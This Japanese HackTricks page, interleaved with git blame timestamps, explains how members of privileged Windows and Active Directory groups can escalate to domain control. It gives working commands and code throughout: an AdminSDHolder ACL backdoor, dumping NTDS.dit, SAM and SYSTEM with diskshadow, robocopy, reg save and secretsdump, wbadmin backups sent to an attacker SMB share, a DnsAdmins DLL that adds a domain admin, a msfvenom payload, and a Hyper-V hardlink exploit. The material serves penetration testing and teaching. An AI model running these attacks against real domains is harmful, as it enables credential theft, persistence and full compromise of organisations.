2023-07-07 23:42:27 +00:00
# 特権グループ
2022-04-28 16:01:33 +00:00
< details >
2024-01-13 22:21:48 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をご覧ください!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-02 22:36:59 +00:00
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
2024-01-13 22:21:48 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )で**フォローしてください。**
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有してください。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-02 22:36:59 +00:00
## 管理権限を持つ既知のグループ
2020-07-15 15:43:14 +00:00
2024-01-13 18:44:27 +00:00
* **Administrators**
* **Domain Admins**
* **Enterprise Admins**
2020-07-15 15:43:14 +00:00
2024-01-13 22:21:48 +00:00
セキュリティ評価時に複数の攻撃ベクトルを連鎖させる際にも役立つ、他のアカウントメンバーシップやアクセストークン権限があります。
2020-07-15 15:43:14 +00:00
2024-01-13 22:21:48 +00:00
## アカウントオペレーター <a href="#account-operators" id="account-operators"></a>
2022-10-05 21:11:58 +00:00
2024-01-13 22:21:48 +00:00
* ドメイン上で非管理者アカウントとグループを作成することを許可
* DCにローカルでログインすることを許可
2022-10-05 21:11:58 +00:00
2023-07-07 23:42:27 +00:00
グループの**メンバー**を取得する:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Account Operators" -Recurse
```
2024-01-13 18:44:27 +00:00
spotless'ユーザーメンバーシップに注目してください:
2022-10-05 21:11:58 +00:00
2023-06-06 22:57:49 +00:00
![](< .. / . . / . gitbook / assets / 1 ( 2 ) ( 1 ) ( 1 ) . png > )
2022-10-05 21:11:58 +00:00
2023-11-05 23:28:28 +00:00
しかし、新しいユーザーを追加することはまだ可能です:
2022-10-05 21:11:58 +00:00
![](../../.gitbook/assets/a2.png)
2023-07-07 23:42:27 +00:00
また、DC01にローカルでログインすることもできます:
2022-10-05 21:11:58 +00:00
![](../../.gitbook/assets/a3.png)
2024-01-13 22:21:48 +00:00
## AdminSDHolder グループ
2020-07-15 15:43:14 +00:00
2024-01-13 22:21:48 +00:00
**AdminSDHolder** オブジェクトのアクセスコントロールリスト( ACL) は、Active Directory内の**すべての「保護されたグループ」**とそのメンバーに**権限**を**コピー**するためのテンプレートとして使用されます。保護されたグループには、Domain Admins、Administrators、Enterprise Admins、Schema Adminsなどの特権グループが含まれます。\
デフォルトでは、このグループのACLはすべての「保護されたグループ」内にコピーされます。これは、これらの重要なグループへの意図的または偶発的な変更を防ぐために行われます。しかし、攻撃者が例えば一般ユーザーに完全な権限を与えることで**AdminSDHolder** グループのACLを変更した場合、このユーザーは( 1時間以内に) 保護されたグループ内のすべてのグループに対して完全な権限を持つことになります。\
そして、誰かが( 例えば) Domain Adminsからこのユーザーを削除しようとした場合、1時間以内に、そのユーザーはグループに戻ってきます。
2022-10-05 21:11:58 +00:00
2023-07-07 23:42:27 +00:00
グループの**メンバー**を取得する:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
```
2024-01-02 22:36:59 +00:00
**AdminSDHolder** グループにユーザーを追加する:
2022-10-05 21:11:58 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
```
2024-01-02 22:36:59 +00:00
ユーザーが **Domain Admins** グループ内にいるかどうかを確認します:
2022-10-05 21:11:58 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
```
2024-01-02 22:36:59 +00:00
待ち時間を1時間待ちたくない場合は、PSスクリプトを使用して即時に復元を行うことができます: [https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1)
2020-07-15 15:43:14 +00:00
2024-01-02 22:36:59 +00:00
[**ired.teamでの詳細情報。** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence )
2020-07-15 15:43:14 +00:00
2024-01-02 22:36:59 +00:00
## **AD リサイクルビン**
2020-07-15 15:43:14 +00:00
2024-01-13 18:44:27 +00:00
このグループは、削除されたADオブジェクトを読む権限を与えます。そこには興味深い情報が見つかるかもしれません:
2022-10-05 21:11:58 +00:00
```bash
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the "AD Recycle Bin" group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
2023-07-07 23:42:27 +00:00
### ドメインコントローラへのアクセス
2022-10-03 21:39:01 +00:00
2024-01-02 22:36:59 +00:00
現在のメンバーシップではDC上のファイルにアクセスできないことに注意してください:
2020-07-15 15:43:14 +00:00
![](../../.gitbook/assets/a4.png)
2023-07-07 23:42:27 +00:00
しかし、ユーザーが`Server Operators`に属している場合:
2020-07-15 15:43:14 +00:00
![](../../.gitbook/assets/a5.png)
2024-01-02 22:36:59 +00:00
話は変わります:
2020-07-15 15:43:14 +00:00
![](../../.gitbook/assets/a6.png)
2024-01-02 22:36:59 +00:00
### 権限昇格 <a href="#backup-operators" id="backup-operators"></a>
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
サービスの権限を確認するには、Sysinternalsの[`PsService`](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice)または`sc`を使用します。
2022-10-03 21:39:01 +00:00
```
C:\> .\PsService.exe security AppReadiness
PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
[...]
2023-07-07 23:42:27 +00:00
[ALLOW] BUILTIN\Server Operators
All
2022-10-03 21:39:01 +00:00
```
2024-01-02 22:36:59 +00:00
このことから、Server Operators グループには [SERVICE\_ALL\_ACCESS ](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights ) アクセス権があり、このサービスを完全に制御できることが確認できます。
このサービスを悪用して[**任意のコマンドを実行させるサービスを作成**](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#modify-service-binary-path)し、権限を昇格させることができます。
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
## バックアップオペレータ <a href="#backup-operators" id="backup-operators"></a>
2020-07-15 15:43:14 +00:00
2024-01-02 22:36:59 +00:00
`Server Operators` のメンバーシップと同様に、`Backup Operators` に属している場合、`DC01` のファイルシステムに**アクセスできます**。
2022-10-03 20:20:19 +00:00
2024-01-13 22:21:48 +00:00
これは、このグループがメンバーに [**`SeBackup`** ](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4 ) と [**`SeRestore`** ](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5 ) の権限を付与するためです。**SeBackupPrivilege** により、任意のフォルダを**横断し、フォルダの内容をリスト**することができます。これにより、他に許可がなくても**フォルダからファイルをコピー**することができます。ただし、この権限を悪用してファイルをコピーするには、フラグ [**FILE\_FLAG\_BACKUP\_SEMANTICS** ](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea ) を使用する必要があります。したがって、特別なツールが必要です。
2022-10-03 20:20:19 +00:00
2024-01-13 22:21:48 +00:00
この目的のために、[**これらのスクリプト**](https://github.com/giuliano108/SeBackupPrivilege)を使用できます。
2022-10-05 21:11:58 +00:00
2023-07-07 23:42:27 +00:00
グループの**メンバー**を取得する:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
2024-01-13 22:21:48 +00:00
### **ローカル攻撃**
2022-10-03 20:20:19 +00:00
```bash
# Import libraries
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege # ...or whoami /priv | findstr Backup SeBackupPrivilege is disabled
# Enable SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
# List Admin folder for example and steal a file
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\\report.pdf c:\temp\x.pdf -Overwrite
```
2023-07-07 23:42:27 +00:00
### AD攻撃
2022-10-03 20:20:19 +00:00
2024-01-13 22:21:48 +00:00
例えば、ドメインコントローラのファイルシステムに直接アクセスすることができます:
2020-07-15 15:43:14 +00:00
![](../../.gitbook/assets/a7.png)
2024-01-02 22:36:59 +00:00
このアクセスを悪用して、アクティブディレクトリデータベース ** `NTDS.dit` ** を**盗む**ことで、ドメイン内のすべてのユーザーとコンピュータオブジェクトの**NTLMハッシュ**を取得できます。
2022-10-03 20:20:19 +00:00
2023-11-05 23:28:28 +00:00
#### diskshadow.exeを使用してNTDS.ditをダンプする
2024-01-13 22:21:48 +00:00
[**diskshadow** ](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow )を使用すると、**`C`ドライブ**のシャドウコピーを作成し、例えば`F`ドライブに配置することができます。その後、システムによって使用されていないこのシャドウコピーから`NTDS.dit`ファイルを盗むことができます:
2022-10-03 20:20:19 +00:00
```
diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 10:34:16 AM
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% F:
DISKSHADOW> end backup
DISKSHADOW> exit
```
2024-01-02 22:36:59 +00:00
ローカル攻撃と同様に、特権ファイル ** `NTDS.dit` ** をコピーすることができます:
2022-10-03 20:20:19 +00:00
```
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```
2024-01-13 22:21:48 +00:00
ファイルをコピーする別の方法は、[**robocopy**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy)**:** を使用することです。
2022-10-03 20:20:19 +00:00
```
robocopy /B F:\Windows\NTDS .\ntds ntds.dit
```
2024-01-02 22:36:59 +00:00
その後、簡単に**SYSTEM**と**SAM**を**盗む**ことができます:
2022-10-03 20:20:19 +00:00
```
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```
2024-01-02 22:36:59 +00:00
最終的に、**`NTDS.dit`** から**すべてのハッシュを取得**できます:
2022-10-03 20:20:19 +00:00
```shell-session
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
2024-01-02 22:36:59 +00:00
#### wbadmin.exeを使用してNTDS.ditをダンプする
2023-11-05 23:28:28 +00:00
2024-01-02 22:36:59 +00:00
wbadmin.exeの使用はdiskshadow.exeと非常に似ています。wbadmin.exeユーティリティは、Windows Vista/Server 2008以降のWindowsに組み込まれているコマンドラインユーティリティです。
2023-11-05 23:28:28 +00:00
2024-01-02 22:36:59 +00:00
使用する前に、攻撃者マシンで[**SMBサーバーのためのNTFSファイルシステムを設定する**](https://gist.github.com/manesec/9e0e8000446b966d0f0ef74000829801)必要があります。
2023-11-05 23:28:28 +00:00
2024-01-02 22:36:59 +00:00
SMBサーバーの設定が完了したら、ターゲットマシンでSMBクレデンシャルをキャッシュする必要があります:
2023-11-05 23:28:28 +00:00
```
# cache the smb credential.
net use X: \\< AttackIP > \sharename /user:smbuser password
# check if working.
dir X:\
```
2024-01-13 18:44:27 +00:00
エラーがなければ、それを悪用するためにwbadmin.exeを使用します:
2023-11-05 23:28:28 +00:00
```
# Start backup the system.
# In here, no need to use `X:\`, just using `\\<AttackIP>\sharename` should be ok.
echo "Y" | wbadmin start backup -backuptarget:\\< AttackIP > \sharename -include:c:\windows\ntds
# Look at the backup version to get time.
wbadmin get versions
# Restore the version to dump ntds.dit.
echo "Y" | wbadmin start recovery -version:10/09/2023-23:48 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
```
2024-01-13 22:21:48 +00:00
```markdown
2024-01-02 22:36:59 +00:00
成功すると、`C:\ntds.dit`にダンプされます。
2023-11-05 23:28:28 +00:00
2024-01-02 22:36:59 +00:00
[DEMO VIDEO WITH IPPSEC ](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s )
2023-11-05 23:28:28 +00:00
2022-10-03 21:39:01 +00:00
## DnsAdmins
2020-07-15 15:43:14 +00:00
2024-01-13 22:21:48 +00:00
**DNSAdmins** グループのメンバー、または **DNS** サーバーオブジェクトに対する**書き込み権限**を持つユーザーは、**DNSサーバー**上で**SYSTEM**権限を持つ**任意のDLL**をロードすることができます。\
これは、**ドメインコントローラー**が**DNSサーバー**として頻繁に**使用される**ため、非常に興味深いです。
2020-07-15 15:43:14 +00:00
2024-01-13 22:21:48 +00:00
この\*\*\*\* [**ポスト** ](https://adsecurity.org/?p=4064 )に示されているように、DNSがドメインコントローラーで実行されている場合( 非常に一般的です) 、以下の攻撃を実行できます:
2020-07-15 15:43:14 +00:00
2024-01-02 22:36:59 +00:00
* DNS管理はRPCを介して行われます
2024-01-13 22:21:48 +00:00
* [**ServerLevelPluginDll** ](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723 ) は、DLLのパスの検証**ゼロ**でカスタム**DLL**を**ロード**することを可能にします。これはコマンドラインから `dnscmd` ツールを使用して行うことができます
2024-01-02 22:36:59 +00:00
* **`DnsAdmins`** グループのメンバーが以下の ** `dnscmd` ** コマンドを実行すると、`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll` レジストリキーが設定されます
2024-01-13 22:21:48 +00:00
* **DNSサービスが再起動されると**、このパスの**DLL**が**ロードされます**(例えば、ドメインコントローラーのマシンアカウントがアクセスできるネットワーク共有)
* 攻撃者は、**カスタムDLLをロードしてリバースシェルを取得する**か、MimikatzのようなツールをDLLとしてロードして認証情報をダンプすることができます。
2022-10-05 21:11:58 +00:00
2024-01-13 22:21:48 +00:00
グループの**メンバー**を取得する:
2024-01-02 22:36:59 +00:00
```
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "DnsAdmins" -Recurse
```
2024-01-13 22:21:48 +00:00
### 任意のDLLを実行
2022-10-05 21:11:58 +00:00
2024-01-13 22:21:48 +00:00
**DNSAdmins グループ**内にユーザーがいる場合、**DNSサーバーに SYSTEM 権限で任意のDLLをロード**させることができます( DNSサービスは `NT AUTHORITY\SYSTEM` として実行されます) 。DNSサーバーに **ローカルまたはリモート** ( SMBで共有された) DLLファイルをロードして実行するには、次の操作を行います:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
```
2024-01-02 22:36:59 +00:00
```markdown
2024-01-13 18:44:27 +00:00
有効なDLLの例は[https://github.com/kazkansouh/DNSAdmin-DLL](https://github.com/kazkansouh/DNSAdmin-DLL)で見つけることができます。私は関数`DnsPluginInitialize`のコードを次のように変更します:
2024-01-02 22:36:59 +00:00
```
2020-07-15 15:43:14 +00:00
```c
DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
{
2023-07-07 23:42:27 +00:00
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
2020-07-15 15:43:14 +00:00
}
```
2023-07-07 23:42:27 +00:00
または、msfvenomを使用してdllを生成することもできます:
2022-10-03 21:39:01 +00:00
```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" < username > /add /domain' -f dll -o adduser.dll
```
2024-01-02 22:36:59 +00:00
したがって、**DNSservice** が開始または再起動されると、新しいユーザーが作成されます。
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
DNSAdmin グループ内にユーザーがいても、**デフォルトでは DNS サービスを停止および再起動することはできません。** しかし、次の操作を試みることはできます:
2020-07-15 15:43:14 +00:00
```csharp
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns
```
2022-10-03 21:39:01 +00:00
#### Mimilib.dll
2024-01-02 22:36:59 +00:00
この[**投稿**](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html)で詳しく説明されているように、`Mimikatz`ツールの作成者が提供する[**mimilib.dll**](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib)を使用して、[**kdns.c**](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c)ファイルを**変更**し、**リバースシェル**のワンライナーや選択した他のコマンドを実行することでコマンド実行を得ることが可能です。
2022-10-03 21:39:01 +00:00
2024-01-02 22:36:59 +00:00
### WPADレコードによるMitM
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
**DnsAdmins**グループの権限を**悪用**する別の方法は、**WPADレコード**を作成することです。このグループのメンバーであれば、[グローバルクエリブロックセキュリティを無効にする](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps)権限があり、これはデフォルトでこの攻撃をブロックします。Server 2008は、DNSサーバー上でグローバルクエリブロックリストに追加する機能を初めて導入しました。デフォルトでは、Web Proxy Automatic Discovery Protocol (WPAD) と Intra-site Automatic Tunnel Addressing Protocol (ISATAP) がグローバルクエリブロックリストに含まれています。これらのプロトコルはハイジャックに非常に脆弱で、どのドメインユーザーでもこれらの名前を含むコンピューターオブジェクトやDNSレコードを作成することができます。
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
**グローバルクエリブロックリストを無効にし**、**WPADレコード**を作成した後、デフォルト設定でWPADを実行している**すべてのマシン**のトラフィックは、**攻撃マシンを介してプロキシされます**。[**Responder**](https://github.com/lgandx/Responder)や[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh)などのツールを使用してトラフィックのスプーフィングを行い、パスワードハッシュをキャプチャしてオフラインでクラックするか、SMBRelay攻撃を試みることができます。
2022-10-03 21:39:01 +00:00
2022-10-05 20:40:19 +00:00
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md ](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md )
{% endcontent-ref %}
2022-10-03 21:39:01 +00:00
2024-01-02 22:36:59 +00:00
## イベントログリーダー
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
[**イベントログリーダー** ](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn579255\(v=ws.11\ )?redirectedfrom=MSDN#event-log-readers)グループのメンバーは、生成されたイベントログ(新しいプロセス作成ログなど)に**アクセスする権限**を持っています。ログには**機密情報**が含まれている可能性があります。ログの可視化方法について見ていきましょう:
2022-10-03 21:39:01 +00:00
```powershell
2022-10-05 21:11:58 +00:00
#Get members of the group
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
2022-10-05 22:52:18 +00:00
Get-NetLocalGroupMember -ComputerName < pc name > -GroupName "Event Log Readers"
2022-10-05 21:11:58 +00:00
2022-10-03 21:39:01 +00:00
# To find "net [...] /user:blahblah password"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
# Using other users creds
wevtutil qe Security /rd:true /f:text /r:share01 /u:< username > /p:< pwd > | findstr "/user"
# Search using PowerShell
Get-WinEvent -LogName security [-Credential $creds] | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
```
2024-01-02 22:36:59 +00:00
## Exchange Windows 権限
2022-10-05 22:52:18 +00:00
2024-01-02 22:36:59 +00:00
メンバーは**ドメインオブジェクトにDACLを書き込む**能力が与えられます。攻撃者はこれを悪用して、ユーザーに[**DCSync**](dcsync.md)権限を**与える**ことができます。\
2024-01-13 22:21:48 +00:00
AD環境にMicrosoft Exchangeがインストールされている場合、このグループのメンバーとしてユーザーアカウントやコンピューターが見つかることが一般的です。
2022-10-05 22:52:18 +00:00
2024-01-13 22:21:48 +00:00
この [**GitHub リポジトリ** ](https://github.com/gdedrouas/Exchange-AD-Privesc ) は、このグループの権限を悪用して**権限を昇格する**いくつかの**テクニック**を説明しています。
2022-10-05 22:52:18 +00:00
```powershell
#Get members of the group
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
```
2024-01-02 22:36:59 +00:00
## Hyper-V 管理者
2022-10-05 22:52:18 +00:00
2024-01-13 18:44:27 +00:00
[**Hyper-V 管理者** ](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#hyper-v-administrators ) グループは、すべての [Hyper-V 機能 ](https://docs.microsoft.com/en-us/windows-server/manage/windows-admin-center/use/manage-virtual-machines ) に完全なアクセス権を持っています。**ドメインコントローラー**が **仮想化**されている場合、**仮想化管理者**は **ドメイン管理者**と見なすべきです。彼らは簡単に**ライブドメインコントローラーのクローンを作成**し、仮想**ディスク**をオフラインで**マウント**して、ドメイン内のすべてのユーザーの NTLM パスワードハッシュを含む ** `NTDS.dit` ** ファイルを取得することができます。
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
また、この[ブログ](https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/)によく文書化されているように、仮想マシンを**削除**すると、`vmms.exe`は対応する**`.vhdx` ファイル**の元のファイル権限を**復元**しようとしますが、ユーザーを偽装せずに `NT AUTHORITY\SYSTEM` として行います。私たちは ** `.vhdx` ** ファイルを**削除**し、このファイルを**保護された SYSTEM ファイル**にポイントするネイティブ**ハードリンク**を**作成**することができ、完全な権限が与えられます。
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
オペレーティングシステムが [CVE-2018-0952 ](https://www.tenable.com/cve/CVE-2018-0952 ) または [CVE-2019-0841 ](https://www.tenable.com/cve/CVE-2019-0841 ) に対して脆弱である場合、これを利用して SYSTEM 権限を取得することができます。そうでない場合は、サーバー上のアプリケーションが SYSTEM のコンテキストで実行されるサービスをインストールしており、特権のないユーザーによって開始可能であることを**利用しようと試みる**ことができます。
2022-10-03 21:39:01 +00:00
2024-01-02 22:36:59 +00:00
### **悪用例**
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
これの一例は **Firefox** で、**`Mozilla Maintenance Service`** をインストールします。以下のファイルに対して現在のユーザーに完全な権限を付与するために、[このエクスプロイト](https://raw.githubusercontent.com/decoder-it/Hyper-V-admin-EOP/master/hyperv-eop.ps1)( NT ハードリンクの概念実証)を更新することができます:
2022-10-03 21:39:01 +00:00
```bash
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
```
2023-07-07 23:42:27 +00:00
#### **ファイルの所有権を取得する**
2022-10-03 21:39:01 +00:00
2024-01-02 22:36:59 +00:00
PowerShellスクリプトを実行した後、**このファイルを完全に制御し、所有権を取得できるはずです**。
2022-10-03 21:39:01 +00:00
```bash
C:\htb> takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
```
2024-01-13 18:44:27 +00:00
#### **Mozilla Maintenance Serviceの開始**
2022-10-03 21:39:01 +00:00
2024-01-13 22:21:48 +00:00
次に、このファイルを**悪意のある `maintenanceservice.exe` ** に置き換え、メンテナンス**サービス**を**開始**し、SYSTEMとしてコマンド実行を行います。
2022-10-03 21:39:01 +00:00
```
C:\htb> sc.exe start MozillaMaintenance
```
{% hint style="info" %}
2024-01-13 22:21:48 +00:00
このベクターは、2020年3月のWindowsセキュリティアップデートによって緩和されました。これは、ハードリンクに関連する動作を変更したものです。
2022-10-03 21:39:01 +00:00
{% endhint %}
2023-07-07 23:42:27 +00:00
## 組織管理
2022-10-05 22:52:18 +00:00
2024-01-02 22:36:59 +00:00
このグループは、**Microsoft Exchange**がインストールされている環境にも存在します。\
2023-07-07 23:42:27 +00:00
このグループのメンバーは、**すべての**ドメインユーザーの**メールボックス**に**アクセス**できます。\
2024-01-02 22:36:59 +00:00
また、このグループは`Microsoft Exchange Security Groups`というOUの**完全な制御**を持っており、その中にはグループ[**`Exchange Windows Permissions`**](privileged-groups-and-token-privileges.md#exchange-windows-permissions)が含まれています(このグループを悪用して権限昇格する方法についてはリンクを参照してください)。
2022-10-05 22:52:18 +00:00
2024-01-02 22:36:59 +00:00
## 印刷オペレーター
2022-10-05 21:11:58 +00:00
2023-07-07 23:42:27 +00:00
このグループのメンバーには以下が付与されます:
2022-10-05 21:11:58 +00:00
* [**`SeLoadDriverPrivilege`** ](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#seloaddriverprivilege-3.1.7 )
2024-01-02 22:36:59 +00:00
* **ドメインコントローラーにローカルでログオン**してシャットダウンする
2024-01-13 22:21:48 +00:00
* ドメインコントローラーに接続された**プリンター**の管理、作成、共有、削除の権限
2022-10-05 21:11:58 +00:00
{% hint style="warning" %}
2024-01-13 22:21:48 +00:00
もしコマンド`whoami /priv`が昇格していないコンテキストで**`SeLoadDriverPrivilege`**を表示しない場合、UACをバイパスする必要があります。
2022-10-05 21:11:58 +00:00
{% endhint %}
2023-07-07 23:42:27 +00:00
グループの**メンバー**を取得する:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Print Operators" -Recurse
```
2024-01-13 22:21:48 +00:00
このページでSeLoadDriverPrivilegeを悪用して権限昇格する方法を確認してください:
2022-10-05 21:11:58 +00:00
{% content-ref url="../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/abuse-seloaddriverprivilege.md" %}
[abuse-seloaddriverprivilege.md ](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/abuse-seloaddriverprivilege.md )
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
## リモートデスクトップユーザー
2022-10-05 21:11:58 +00:00
2024-01-02 22:36:59 +00:00
このグループのメンバーはRDPを通じてPCにアクセスできます。\
2023-07-07 23:42:27 +00:00
グループの**メンバー**を取得する:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName < pc name > -GroupName "Remote Desktop Users"
```
2024-01-13 18:44:27 +00:00
**RDP** についての詳細情報:
2022-10-05 21:11:58 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-rdp.md" %}
[pentesting-rdp.md ](../../network-services-pentesting/pentesting-rdp.md )
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
## リモート管理ユーザー
2022-10-05 21:11:58 +00:00
2024-01-02 22:36:59 +00:00
このグループのメンバーは、**WinRM** を介してPCにアクセスできます。
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName < pc name > -GroupName "Remote Management Users"
```
2024-01-02 22:36:59 +00:00
**WinRM**についての詳細情報:
2022-10-05 21:11:58 +00:00
{% content-ref url="../../network-services-pentesting/5985-5986-pentesting-winrm.md" %}
[5985-5986-pentesting-winrm.md ](../../network-services-pentesting/5985-5986-pentesting-winrm.md )
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
## サーバーオペレーター <a href="#server-operators" id="server-operators"></a>
2022-10-05 21:11:58 +00:00
2024-01-13 18:44:27 +00:00
このメンバーシップは、以下の権限を持つドメインコントローラーの設定をユーザーに許可します:
2022-10-05 21:11:58 +00:00
2024-01-02 22:36:59 +00:00
* ローカルにログオンする
2023-07-07 23:42:27 +00:00
* ファイルとディレクトリのバックアップ
2024-01-02 22:36:59 +00:00
* \`\`[`SeBackupPrivilege` ](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#sebackupprivilege-3.1.4 ) と [`SeRestorePrivilege` ](../windows-local-privilege-escalation/privilege-escalation-abusing-tokens/#serestoreprivilege-3.1.5 )
* システム時刻の変更
2023-07-07 23:42:27 +00:00
* タイムゾーンの変更
* リモートシステムからの強制シャットダウン
* ファイルとディレクトリの復元
* システムのシャットダウン
* ローカルサービスの制御
2022-10-05 21:11:58 +00:00
2024-01-02 22:36:59 +00:00
グループの**メンバー**を取得する:
2022-10-05 21:11:58 +00:00
```powershell
Get-NetGroupMember -Identity "Server Operators" -Recurse
```
2024-01-13 18:44:27 +00:00
## 参照 <a href="#references" id="references"></a>
2020-07-15 15:43:14 +00:00
